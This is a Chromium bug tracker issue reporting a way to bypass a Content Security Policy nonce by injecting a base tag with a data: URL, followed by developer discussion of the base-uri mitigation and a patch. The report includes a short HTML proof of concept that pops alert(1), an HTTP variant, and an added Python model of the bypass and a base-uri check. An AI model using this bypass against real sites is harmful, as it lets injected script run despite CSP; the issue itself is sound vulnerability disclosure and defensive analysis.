
Issue 689412

Starred by 3 users

Issue metadata

Status: Duplicate
Merged: issue 679318
Owner: mkwst@chromium.org
Closed: Feb 2017
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 2
Type: Feature




Bypass CSP nonce using base href="data:..."

Reported by masa....@gmail.com, Feb 7 2017

Issue description

UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36

Steps to reproduce the problem:
PoC:

<html>
<head>
<meta http-equiv=content-security-policy content="object-src 'none';script-src 'nonce-random-secret'">
<title> Fake XSS </title> </head>
<body>
<base href=data:/,-alert(1)/>
<script src="./lib/jquery.js" nonce=random-secret></script>
</body>
</html>

Online PoC: https://jsbin.com/vigodiqifo/1/edit?html,output

What is the expected behavior?
An alert box will appear.

What went wrong?
The base URI changed the script URI, which bypassed the nonce protection.

Did this work before? N/A 

Chrome version: 55.0.2883.95  Channel: n/a
OS Version: OS X 10.12.0
Flash Version: Shockwave Flash 24.0 r0

Components: Blink>SecurityFeature
Labels: OS-Windows
Status: Untriaged (was: Unconfirmed)
Summary: Bypass CSP nonce using base href="data:..." (was: Bypass CSP nonce)
Repros in 58.3005. Allowing base URIs to use the data: protocol seems horrifying.
Cc: elawrence@chromium.org
Labels: Security_Severity-Medium Security_Impact-Stable
Owner: mkwst@chromium.org
Status: Assigned (was: Untriaged)
Can be reproduced in current stable too. Adding security labels.
mkwst@, could you help triage this issue? Thanks!

Comment 3 by masa....@gmail.com, Feb 8 2017

<base href=http://html5sec.org>: an HTTP URI also works.

Comment 4 by mkwst@chromium.org, Feb 8 2017

Cc: a...@google.com
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam OS-Android OS-Chrome OS-Linux Type-Feature
Yeah, I added metrics to M57 for exactly this case (which look pretty low), and filed https://github.com/whatwg/html/issues/2249 to see about changing the spec. Anne wasn't terribly impressed, but I think it's still a change worth making.

As for the `http` version, that's expected: if you care about preventing `<base>` injection, `base-uri` is there for you. I believe "Strict CSP" folks plan to add it to their recommendations. CCing Artur as an FYI.

Dropping visibility flags, as this is a known and public issue.
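
The two behaviours discussed in this thread, a relative `<script src>` resolving against an injected `<base href>` (the PoC in the issue description and the HTTP variant in comment 3) and the `base-uri` directive named above as the mitigation, as an added Python example. This is not code from the Chromium issue or the Chromium project. The resolver is a simplified RFC 3986 section 5.2 implementation written here because `urllib.parse.urljoin` declines to resolve references against non-hierarchical schemes such as `data:`; the `base-uri` model only understands `'none'` and `'self'`; the document URL `https://example.test/page.html` is a constructed value.

```python
"""Added example, not part of the Chromium issue: shows why a nonce-based
script-src without base-uri is bypassable via <base href>, and that adding
base-uri 'none' makes the relative src resolve against the document again."""
from urllib.parse import urlsplit


def remove_dot_segments(path: str) -> str:
    """Simplified RFC 3986 5.2.4: drop "." segments, let ".." pop one segment."""
    out = []
    for seg in path.split("/"):
        if seg == ".":
            continue
        if seg == "..":
            if len(out) > 1:        # never pop the leading "" that marks the root
                out.pop()
            continue
        out.append(seg)
    return "/".join(out)


def resolve(base: str, ref: str) -> str:
    """Minimal RFC 3986 5.2.2 reference resolution (assumes a base with a
    hierarchical path, which is exactly what "data:/,..." provides)."""
    b, r = urlsplit(base), urlsplit(ref)
    if r.scheme:                    # absolute reference: base is irrelevant
        return ref
    if r.netloc:                    # scheme-relative reference ("//host/x")
        netloc, path = r.netloc, r.path
    else:
        netloc = b.netloc
        if r.path.startswith("/"):
            path = r.path
        elif r.path:
            # 5.2.3 merge: keep the base path up to and excluding its last "/"
            head = b.path.rsplit("/", 1)[0] if "/" in b.path else ""
            path = head + "/" + r.path
        else:
            path = b.path
    path = remove_dot_segments(path)
    authority = f"//{netloc}" if netloc else ""
    query = f"?{r.query}" if r.query else ""
    return f"{b.scheme}:{authority}{path}{query}"


def parse_csp(policy: str) -> dict:
    """Parse a CSP header value into {directive: [source expressions]}."""
    out = {}
    for directive in policy.split(";"):
        parts = directive.split()
        if parts:
            out[parts[0].lower()] = parts[1:]
    return out


def base_uri_findings(policy: str) -> list:
    """Flag a policy whose script-src relies on nonces/hashes but leaves
    <base href> unrestricted (no base-uri directive)."""
    p = parse_csp(policy)
    script = p.get("script-src", p.get("default-src", []))
    nonce_or_hash = any(s.startswith("'nonce-") or s.startswith("'sha") for s in script)
    if nonce_or_hash and "base-uri" not in p:
        return ["script-src uses nonces/hashes but base-uri is absent: an injected "
                "<base href> can redirect relative script URLs (issue 689412)"]
    return []


def base_allowed(policy: str, document_url: str, base_href: str) -> bool:
    """Toy model of base-uri: handles absence, 'none' and 'self' only
    (real browsers match the full source list)."""
    sources = parse_csp(policy).get("base-uri")
    if sources is None:
        return True                 # no directive: any <base href> is honoured
    if "'none'" in sources:
        return False
    if "'self'" in sources:
        d, b = urlsplit(document_url), urlsplit(base_href)
        return (b.scheme, b.netloc) == (d.scheme, d.netloc)
    return False                    # hypothetical: host-source matching omitted


def effective_script_url(policy: str, document_url: str, base_href: str, src: str) -> str:
    """URL the browser would fetch for <script src=SRC> given the policy and an
    injected <base href>: the base element is only used when base-uri allows it."""
    base = base_href if base_allowed(policy, document_url, base_href) else document_url
    return resolve(base, src)


# Policy from the PoC above, and the same policy with the mitigation added.
WEAK = "object-src 'none';script-src 'nonce-random-secret'"
STRICT = WEAK + "; base-uri 'none'"
DOC = "https://example.test/page.html"      # constructed document URL

if __name__ == "__main__":
    for label, policy in (("weak", WEAK), ("strict", STRICT)):
        print(label, base_uri_findings(policy) or "ok",
              effective_script_url(policy, DOC, "data:/,-alert(1)/", "./lib/jquery.js"))
```

Running it shows the nonced `./lib/jquery.js` resolving to `data:/,-alert(1)/lib/jquery.js` under the weak policy and back to `https://example.test/lib/jquery.js` once `base-uri 'none'` is present; the `http://html5sec.org` variant from comment 3 behaves the same way, which is why the thread treats it as expected behaviour rather than a bug.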

Comment 5 by a...@google.com, Feb 8 2017

Yes, I also filed a bug for a documentation change in the spec to mention that base-uri is important for nonce-based policies:
https://github.com/w3c/webappsec-csp/issues/177

I'm planning to push a change to Google's public CSP documentation (csp.withgoogle.com) to mention this Real Soon Now.

Comment 6 by mkwst@chromium.org, Feb 14 2017

Merged into: 679318
Status: Duplicate (was: Assigned)
Duping this into 679318, where I landed a patch to prevent `data` from being used as a `<base href>`.
